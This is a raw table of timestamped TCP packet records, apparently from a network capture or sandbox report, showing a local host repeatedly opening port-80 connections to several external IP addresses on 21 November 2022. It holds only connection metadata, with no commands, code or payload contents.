                                                                                                                                                                                    Nov 21, 2022 19:21:16.337223053 CET80498443.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:16.338378906 CET80498443.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:16.338460922 CET80498443.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:16.338790894 CET4984480192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:21:17.194904089 CET4984480192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:21:18.210465908 CET4984580192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:21:18.357820988 CET80498453.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:18.358172894 CET4984580192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:21:18.358172894 CET4984580192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:21:18.505446911 CET80498453.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:18.505521059 CET80498453.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:18.505567074 CET80498453.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:18.505892992 CET4984580192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:21:19.366357088 CET4984580192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:21:20.381932020 CET4984680192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:21:20.528316975 CET80498463.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:20.528575897 CET4984680192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:21:20.529202938 CET4984680192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:21:20.529377937 CET4984680192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:21:20.675622940 CET80498463.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:20.675637007 CET80498463.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:20.675885916 CET4984680192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:21:20.675941944 CET80498463.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:20.676038027 CET80498463.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:20.676047087 CET80498463.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:20.676204920 CET80498463.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:20.676213980 CET80498463.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:20.676222086 CET80498463.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:20.676225901 CET4984680192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:21:20.676397085 CET4984680192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:21:20.676415920 CET80498463.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:20.676568031 CET4984680192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:21:20.676700115 CET80498463.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:20.676736116 CET4984680192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:21:20.676848888 CET80498463.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:20.677097082 CET4984680192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:21:20.822694063 CET80498463.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:20.822756052 CET80498463.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:20.823038101 CET80498463.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:20.823056936 CET4984680192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:21:20.823108912 CET4984680192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:21:20.823199034 CET80498463.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:20.823245049 CET80498463.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:20.823283911 CET80498463.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:20.823324919 CET80498463.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:20.823339939 CET4984680192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:21:20.823405981 CET80498463.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:20.823446035 CET80498463.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:20.823483944 CET80498463.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:20.971096039 CET80498463.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:20.971158028 CET80498463.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:20.971198082 CET80498463.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:20.971235991 CET80498463.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:20.971277952 CET80498463.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:21.014209986 CET80498463.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:21.537744999 CET4984680192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:21:22.553416014 CET4984780192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:21:22.700448036 CET80498473.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:22.700689077 CET4984780192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:21:22.700804949 CET4984780192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:21:22.847863913 CET80498473.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:22.848660946 CET80498473.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:22.848743916 CET80498473.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:22.849129915 CET4984780192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:21:22.849131107 CET4984780192.168.11.203.13.90.76
                                                                                                                                                                                    Nov 21, 2022 19:21:22.996083021 CET80498473.13.90.76192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:28.100662947 CET4984880192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:21:28.129446030 CET80498482.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:28.129756927 CET4984880192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:21:28.129893064 CET4984880192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:21:28.157911062 CET80498482.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:28.157994032 CET80498482.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:28.158046961 CET80498482.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:28.158312082 CET4984880192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:21:29.145431995 CET4984880192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:21:30.160953999 CET4984980192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:21:30.189995050 CET80498492.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:30.190220118 CET4984980192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:21:30.190305948 CET4984980192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:21:30.219271898 CET80498492.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:30.229234934 CET80498492.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:30.229296923 CET80498492.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:30.229490042 CET4984980192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:21:31.192099094 CET4984980192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:21:32.207463980 CET4985080192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:21:32.236138105 CET80498502.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:32.236392021 CET4985080192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:21:32.237010956 CET4985080192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:21:32.237097979 CET4985080192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:21:32.265736103 CET80498502.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:32.265818119 CET80498502.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:32.265876055 CET80498502.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:32.266019106 CET80498502.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:32.266040087 CET4985080192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:21:32.266269922 CET4985080192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:21:32.266297102 CET80498502.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:32.266380072 CET80498502.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:32.266432047 CET4985080192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:21:32.266587973 CET4985080192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:21:32.266612053 CET80498502.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:32.266762972 CET4985080192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:21:32.266840935 CET4985080192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:21:32.267007113 CET4985080192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:21:32.295134068 CET80498502.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:32.295212030 CET80498502.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:32.295263052 CET80498502.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:32.295433044 CET4985080192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:21:32.295545101 CET4985080192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:21:32.295614958 CET4985080192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:21:32.295614958 CET80498502.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:32.295687914 CET80498502.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:32.295734882 CET80498502.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:32.295914888 CET80498502.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:32.296046972 CET80498502.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:32.296164036 CET80498502.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:32.324522972 CET80498502.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:32.324599028 CET80498502.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:32.324848890 CET80498502.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:32.324954033 CET80498502.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:32.325197935 CET80498502.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:32.325270891 CET80498502.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:32.325525999 CET4985080192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:21:33.238202095 CET4985080192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:21:34.254034996 CET4985180192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:21:34.282548904 CET80498512.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:34.282773018 CET4985180192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:21:34.282839060 CET4985180192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:21:34.312052965 CET80498512.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:34.312156916 CET80498512.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:34.312216043 CET80498512.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:34.312522888 CET4985180192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:21:34.312681913 CET4985180192.168.11.202.57.90.16
                                                                                                                                                                                    Nov 21, 2022 19:21:34.342578888 CET80498512.57.90.16192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:39.666364908 CET4985280192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:21:39.841260910 CET8049852103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:39.841506004 CET4985280192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:21:39.841573954 CET4985280192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:21:40.016571999 CET8049852103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:40.016932964 CET8049852103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:40.016961098 CET8049852103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:40.017119884 CET4985280192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:21:40.026923895 CET8049852103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:40.027199030 CET4985280192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:21:40.846019030 CET4985280192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:21:41.861543894 CET4985380192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:21:42.050276995 CET8049853103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:42.050669909 CET4985380192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:21:42.050671101 CET4985380192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:21:42.239622116 CET8049853103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:42.239716053 CET8049853103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:42.239768982 CET8049853103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:42.240283012 CET4985380192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:21:43.064136028 CET4985380192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:21:44.079930067 CET4985480192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:21:44.255084991 CET8049854103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:44.255316973 CET4985480192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:21:44.255990028 CET4985480192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:21:44.256022930 CET4985480192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:21:44.256071091 CET4985480192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:21:44.431344032 CET8049854103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:44.431438923 CET8049854103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:44.431495905 CET8049854103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:44.431548119 CET8049854103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:44.431606054 CET8049854103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:44.431605101 CET4985480192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:21:44.431659937 CET8049854103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:44.431735992 CET8049854103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:44.431806087 CET4985480192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:21:44.431952000 CET4985480192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:21:44.432089090 CET4985480192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:21:44.485754967 CET4985480192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:21:44.607755899 CET8049854103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:44.607850075 CET8049854103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:44.607908010 CET8049854103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:44.607955933 CET8049854103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:44.607988119 CET4985480192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:21:44.608001947 CET8049854103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:44.608059883 CET8049854103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:44.608093977 CET4985480192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:21:44.608114958 CET8049854103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:44.608160019 CET4985480192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:21:44.608171940 CET8049854103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:44.783515930 CET8049854103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:44.783617973 CET8049854103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:44.783683062 CET8049854103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:44.783747911 CET8049854103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:44.783809900 CET8049854103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:44.783870935 CET8049854103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:44.783930063 CET8049854103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:44.783989906 CET8049854103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:44.784054995 CET8049854103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:44.784219027 CET4985480192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:21:45.266779900 CET4985480192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:21:46.282521963 CET4985580192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:21:46.471200943 CET8049855103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:46.471414089 CET4985580192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:21:46.471515894 CET4985580192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:21:46.659704924 CET8049855103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:46.659885883 CET8049855103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:46.659972906 CET8049855103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:46.660348892 CET4985580192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:21:46.660514116 CET4985580192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:21:46.848727942 CET8049855103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:59.937493086 CET4985680192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:22:00.103290081 CET804985666.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:00.103486061 CET4985680192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:22:00.103615999 CET4985680192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:22:00.269747019 CET804985666.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:00.395703077 CET804985666.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:00.395788908 CET804985666.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:00.396085024 CET4985680192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:22:01.107141972 CET4985680192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:22:02.122792959 CET4985780192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:22:02.286294937 CET804985766.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:02.286623001 CET4985780192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:22:02.286689997 CET4985780192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:22:02.456500053 CET804985766.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:02.560440063 CET804985766.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:02.560517073 CET804985766.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:02.560748100 CET4985780192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:22:03.294096947 CET4985780192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:22:04.309818983 CET4985880192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:22:04.491302967 CET804985866.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:04.491565943 CET4985880192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:22:04.492155075 CET4985880192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:22:04.492257118 CET4985880192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:22:04.659599066 CET804985866.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:04.659965992 CET4985880192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:22:04.660003901 CET804985866.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:04.660068035 CET804985866.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:04.660115004 CET804985866.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:04.660300016 CET4985880192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:22:04.660435915 CET4985880192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:22:04.660512924 CET4985880192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:22:04.826368093 CET804985866.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:04.826476097 CET804985866.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:04.826550007 CET804985866.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:04.826595068 CET804985866.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:04.826630116 CET4985880192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:22:04.826667070 CET804985866.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:04.826714993 CET804985866.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:04.826781988 CET804985866.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:04.826812983 CET4985880192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:22:04.826828003 CET804985866.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:04.826895952 CET804985866.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:04.826931953 CET4985880192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:22:04.826942921 CET804985866.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:04.827259064 CET804985866.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:04.827306986 CET804985866.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:04.827471972 CET804985866.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:04.828428984 CET804985866.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:04.872252941 CET804985866.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:04.993046045 CET804985866.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:04.993103027 CET804985866.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:04.993413925 CET804985866.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:04.993496895 CET804985866.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:04.993539095 CET804985866.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:04.993886948 CET804985866.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:05.127295017 CET804985866.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:05.127360106 CET804985866.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:05.127607107 CET4985880192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:22:05.496679068 CET4985880192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:22:06.514892101 CET4985980192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:22:06.681525946 CET804985966.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:06.681818962 CET4985980192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:22:06.681900024 CET4985980192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:22:06.848881960 CET804985966.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:06.958236933 CET804985966.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:06.958314896 CET804985966.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:06.958769083 CET4985980192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:22:06.958879948 CET4985980192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:22:07.125037909 CET804985966.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:12.180272102 CET4986080192.168.11.20194.245.148.189
                                                                                                                                                                                    Nov 21, 2022 19:22:12.199503899 CET8049860194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:12.200035095 CET4986080192.168.11.20194.245.148.189
                                                                                                                                                                                    Nov 21, 2022 19:22:12.201611042 CET4986080192.168.11.20194.245.148.189
                                                                                                                                                                                    Nov 21, 2022 19:22:12.219551086 CET8049860194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:12.220195055 CET8049860194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:12.220256090 CET8049860194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:12.220271111 CET8049860194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:12.220446110 CET4986080192.168.11.20194.245.148.189
                                                                                                                                                                                    Nov 21, 2022 19:22:12.220535994 CET8049860194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:12.220732927 CET4986080192.168.11.20194.245.148.189
                                                                                                                                                                                    Nov 21, 2022 19:22:13.213915110 CET4986080192.168.11.20194.245.148.189
                                                                                                                                                                                    Nov 21, 2022 19:22:14.229393959 CET4986180192.168.11.20194.245.148.189
                                                                                                                                                                                    Nov 21, 2022 19:22:14.247967005 CET8049861194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:14.248223066 CET4986180192.168.11.20194.245.148.189
                                                                                                                                                                                    Nov 21, 2022 19:22:14.248290062 CET4986180192.168.11.20194.245.148.189
                                                                                                                                                                                    Nov 21, 2022 19:22:14.267623901 CET8049861194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:14.268018961 CET8049861194.245.148.189192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:14.268090963 CET8049861194.245.148.189192.168.11.20
